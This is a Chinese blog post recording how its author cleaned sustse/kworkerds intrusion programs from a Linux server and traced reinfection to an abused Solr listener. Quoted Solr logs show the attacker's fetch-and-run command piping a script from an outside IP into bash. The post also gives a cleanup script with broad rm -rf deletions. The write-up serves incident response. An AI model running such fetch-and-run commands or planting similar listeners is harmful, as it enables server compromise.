sustse和kworkerds入侵处理

1.参考文章:

https://blog.csdn.net/xinxin_2011/article/details/84936581

https://blog.csdn.net/xinxin_2011/article/details/85047245

文章中介绍了入侵后的服务器的表现以及病毒所在的位置信息，并给出了

处理脚本。在此脚本基础上稍做了些修改，脚本内容如下:

chattr -i /etc

echo "" > /etc/ld.so.preload

rm -rf /etc/cron.d/*

rm -f  /etc/cron.hourly/oanacroner1

chattr +i /etc

chattr -i /var/spool/cron/

rm -rf /var/spool/cron/*

chattr +i /var/spool/cron/

chattr -i /usr/local/lib/*

rm -f /usr/local/lib/*

chattr +i /usr/local/lib

killall sustse

killall kworkerds

rm -f /var/tmp/kworkerds*

rm -f /var/tmp/1.so

rm -f /var/tmp/sustse*

rm -f /tmp/kworkerds*

rm -f /tmp/1.so

rm -f /var/tmp/wc.conf

rm -f /tmp/wc.conf

2.溯源

在使用了第二篇参考文章提供的脚本后，清除了sustse等入侵程序，但是不久后发现该入侵程序又死灰复燃，跟参考文章中描述的现象出现不同，遂决定自己查找该程序的入侵方式。

(1).执行了last、lastlog 等指令未发现入侵异常。

(2).检查了/etc/passwd,/etc/shadow等文件，未发现添加异常用户

(3).根据入侵程序周期性启动的特点，检查了/etc/cron.*相关的目录,在cron.hourly目录中发现了入侵脚本oanacroner1，删除。并修改了处理脚本，添加了rm -f  /etc/cron.hourly/oanacroner1

此时窃喜一番，认为应该彻底解决了这个问题，但是没过多久,发现该程序又出现了。头大

(4).因为服务器上有redis服务程序，想起redis的未授权漏洞，但是并未在定时文件中发现REDIS字样 

(漏洞详见:https://www.freebuf.com/vuls/162035.html)

(5) 采用最原始方式:

cd /

grep -r 158.69.133.18 ./*

获取以下信息:

./beecarry/software/purchase_search/solr-5.2.1/server/logs/solr_log_20190212_0936:INFO  - 2019-02-12 01:40:19.308; [  beecarry_customer_shard1_replica2] org.apache.solr.core.SolrCore; [[beecarry_customer_shard1_replica2] ] Added SolrEventListener for newSearcher: [org.apache.solr.core.RunExecutableListener{exe=sh,args=[-c, curl -s http://158.69.133.18:8220/mr.sh | bash -sh],event=newSearcher,dir=/bin/}]

./beecarry/software/purchase_search/solr-5.2.1/server/logs/solr_log_20190212_0936:INFO  - 2019-02-12 01:40:19.397; [  beecarry_customer_shard1_replica2] org.apache.solr.core.SolrCore; [[beecarry_customer_shard1_replica2] ] Added SolrEventListener for newSearcher: [org.apache.solr.core.RunExecutableListener{exe=sh,args=[-c, curl -s http://158.69.133.18:8220/mr.sh | bash -sh],event=newSearcher,dir=/bin/}]

./beecarry/software/purchase_search/solr-5.2.1/server/logs/solr-8984-console.log:3686 [coreLoadExecutor-5-thread-1-processing-{node_name=*.*.*.*:8984_solr}] INFO  org.apache.solr.core.SolrCore  [  beecarry_customer_shard1_replica1] – [[beecarry_customer_shard1_replica1] ] Added SolrEventListener for newSearcher: [org.apache.solr.core.RunExecutableListener{exe=sh,args=[-c, curl -s http://158.69.133.18:8220/mr.sh | bash -sh],event=newSearcher,dir=/bin/}]

./beecarry/software/purchase_search/solr-5.2.1/server/logs/solr-8984-console.log:3686 [coreLoadExecutor-5-thread-1-processing-{node_name=*.*.*.*:8984_solr}] INFO  org.apache.solr.core.SolrCore  [  beecarry_customer_shard1_replica1] – [[beecarry_customer_shard1_replica1] ] Added SolrEventListener for newSearcher: [org.apache.solr.core.RunExecutableListener{exe=sh,args=[-c, curl -s http://158.69.133.18:8220/mr.sh | bash -sh],event=newSearcher,dir=/bin/}]

./beecarry/software/purchase_search/solr-5.2.1/server/logs/solr_log_20190212_0937:INFO  - 2019-02-12 01:41:04.474; [  beecarry_customer_shard1_replica1] org.apache.solr.core.SolrCore; [[beecarry_customer_shard1_replica1] ] Added SolrEventListener for newSearcher: [org.apache.solr.core.RunExecutableListener{exe=sh,args=[-c, curl -s http://158.69.133.18:8220/mr.sh | bash -sh],event=newSearcher,dir=/bin/}]

./beecarry/software/purchase_search/solr-5.2.1/server/logs/solr_log_20190212_0937:INFO  - 2019-02-12 01:41:04.526; [  beecarry_customer_shard1_replica1] org.apache.solr.core.SolrCore; [[beecarry_customer_shard1_replica1] ] Added SolrEventListener for newSearcher: [org.apache.solr.core.RunExecutableListener{exe=sh,args=[-c, curl -s http://158.69.133.18:8220/mr.sh | bash -sh],event=newSearcher,dir=/bin/}]

./beecarry/software/purchase_search/solr-5.2.1/server/logs/solr-8983-console.log:3712 [coreLoadExecutor-5-thread-1-processing-{node_name=*.*.*.*:8983_solr}] INFO  org.apache.solr.core.SolrCore  [  beecarry_customer_shard1_replica2] – [[beecarry_customer_shard1_replica2] ] Added SolrEventListener for newSearcher: [org.apache.solr.core.RunExecutableListener{exe=sh,args=[-c, curl -s http://158.69.133.18:8220/mr.sh | bash -sh],event=newSearcher,dir=/bin/}]

./beecarry/software/purchase_search/solr-5.2.1/server/logs/solr-8983-console.log:3713 [coreLoadExecutor-5-thread-1-processing-{node_name=*.*.*.*:8983_solr}] INFO  org.apache.solr.core.SolrCore  [  beecarry_customer_shard1_replica2] – [[beecarry_customer_shard1_replica2] ] Added SolrEventListener for newSearcher: [org.apache.solr.core.RunExecutableListener{exe=sh,args=[-c, curl -s http://158.69.133.18:8220/mr.sh | bash -sh],event=newSearcher,dir=/bin/}]

终于找到，原来利用了solr 的一个漏洞.

(漏洞详见:https://issues.apache.org/jira/browse/SOLR-11482)

打开solr的控制台页面，在configs/beecarry_customer集群下找到configoverlay.json文件，里面包含了新添加的listener的名字

调用指令:

curl http://*.*.*.*:8983/solr/beecarry_customer/config -H 'Content-type:application/json' -d '{"delete-listener" : "newlistener-26"}'删除入侵程序添加的listener

增加防火墙设置，禁止外网访问solr,执行上述脚本，清除本机的入侵程序，到此彻底解决了这个问题

3.总结

(1)服务尽量只在内网访问，不对外网开放

(2)修改服务的配置文件，增加服务的验证功能

在此记录了查找入侵程序的过程，主要是为了给自己留一个记录，另外希望给遇到相同问题的同学留一个参考，希望大家都能找到相应的解决方法。